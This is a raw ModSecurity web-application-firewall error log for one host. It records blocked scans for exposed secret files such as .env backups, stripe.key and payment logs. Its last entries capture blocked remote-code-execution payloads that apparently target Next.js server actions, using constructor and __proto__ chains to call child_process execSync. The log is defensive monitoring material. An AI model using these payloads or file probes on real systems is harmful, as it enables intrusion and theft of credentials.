[tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "ab4mI5bRfSjh7anJB8A-8gAAAJY"] [Sat Mar 21 07:01:23.798588 2026] [:error] [pid 15423:tid 15659] [client 185.177.72.50:54390] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "ab4mI-4e17Bf6FBmBRt1SAAAARQ"] [Sat Mar 21 07:01:23.841422 2026] [:error] [pid 15423:tid 15647] [client 185.177.72.50:4596] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "ab4mI-4e17Bf6FBmBRt1SQAAAQs"] [Sat Mar 21 07:01:34.722767 2026] [:error] [pid 15423:tid 15642] [client 185.177.72.50:35354] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/env.backup"] [unique_id "ab4mLu4e17Bf6FBmBRt2DAAAAQc"] [Sat Mar 21 07:01:43.403518 2026] [:error] [pid 12396:tid 12426] [client 185.177.72.50:24518] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-config.old"] [unique_id "ab4mN_YjPxdw8MDv8uX6mAAAAVg"] [Sat Mar 21 07:01:46.722319 2026] [:error] [pid 3636:tid 3731] [client 185.177.72.50:31160] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "ab4mOpnnbJbbwRstIhKT1wAAAEk"] [Sat Mar 21 07:01:47.870783 2026] [:error] [pid 12396:tid 12405] [client 185.177.72.50:31978] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.log"] [unique_id "ab4mO_YjPxdw8MDv8uX7FQAAAUM"] [Sat Mar 21 07:01:48.461580 2026] [:error] [pid 15423:tid 15639] [client 185.177.72.50:31904] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.key"] [unique_id "ab4mPO4e17Bf6FBmBRt3FwAAAQY"] [Sat Mar 21 07:01:49.099525 2026] [:error] [pid 15423:tid 15643] [client 185.177.72.50:32308] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.old"] [unique_id "ab4mPe4e17Bf6FBmBRt3JgAAAQg"] [Sat Mar 21 07:01:50.254276 2026] [:error] [pid 12396:tid 12425] [client 185.177.72.50:32122] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.conf"] [unique_id "ab4mPvYjPxdw8MDv8uX7SgAAAVc"] [Sat Mar 21 07:01:50.462535 2026] [:error] [pid 12396:tid 12406] [client 185.177.72.50:45202] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.backup"] [unique_id "ab4mPvYjPxdw8MDv8uX7TQAAAUQ"] [Sat Mar 21 07:01:50.704273 2026] [:error] [pid 12396:tid 12416] [client 185.177.72.50:32254] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.ini"] [unique_id "ab4mPvYjPxdw8MDv8uX7VQAAAU4"] [Sat Mar 21 07:01:50.883934 2026] [:error] [pid 12396:tid 12402] [client 185.177.72.50:32264] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.bak"] [unique_id "ab4mPvYjPxdw8MDv8uX7WgAAAUA"] [Sat Mar 21 07:01:54.468352 2026] [:error] [pid 15423:tid 15644] [client 185.177.72.50:45378] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/config.inc"] [unique_id "ab4mQu4e17Bf6FBmBRt3XwAAAQk"] [Sat Mar 21 07:01:55.993997 2026] [:error] [pid 3819:tid 3840] [client 185.177.72.50:45620] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/debug.log"] [unique_id "ab4mQxE65-rqk5tmc9O06wAAANM"] [Sat Mar 21 07:01:56.068179 2026] [:error] [pid 15423:tid 15643] [client 185.177.72.50:45498] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/error.log"] [unique_id "ab4mRO4e17Bf6FBmBRt3dQAAAQg"] [Sat Mar 21 07:01:56.084701 2026] [:error] [pid 3819:tid 3835] [client 185.177.72.50:45620] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "ab4mRBE65-rqk5tmc9O07AAAAM4"] [Sat Mar 21 07:01:56.106034 2026] [:error] [pid 12396:tid 12410] [client 185.177.72.50:45544] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "ab4mRPYjPxdw8MDv8uX7uAAAAUg"] [Sat Mar 21 07:01:56.167719 2026] [:error] [pid 12396:tid 12402] [client 185.177.72.50:45524] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "ab4mRPYjPxdw8MDv8uX7uQAAAUA"] [Sat Mar 21 09:08:19.017291 2026] [:error] [pid 3819:tid 3838] [client 85.11.167.19:38068] [client 85.11.167.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1774076925_6652',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1774076925_665..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "ab5D4xE65-rqk5tmc9P4LwAAANE"], referer: https://web.dev-unit.com [Sat Mar 21 09:08:19.092177 2026] [:error] [pid 12396:tid 12411] [client 85.11.167.19:38070] [client 85.11.167.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1774076926',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1774076926',{'timeo..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "ab5D4_YjPxdw8MDv8uXmuAAAAUk"], referer: https://web.dev-unit.com [Sun Mar 22 07:20:38.621017 2026] [:error] [pid 8222:tid 8310] [client 18.185.88.68:38804] [client 18.185.88.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "ab98JicV9LlDN1Y_DphtDAAAAII"] [Sun Mar 22 07:20:38.634111 2026] [:error] [pid 8222:tid 8316] [client 18.185.88.68:38804] [client 18.185.88.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: 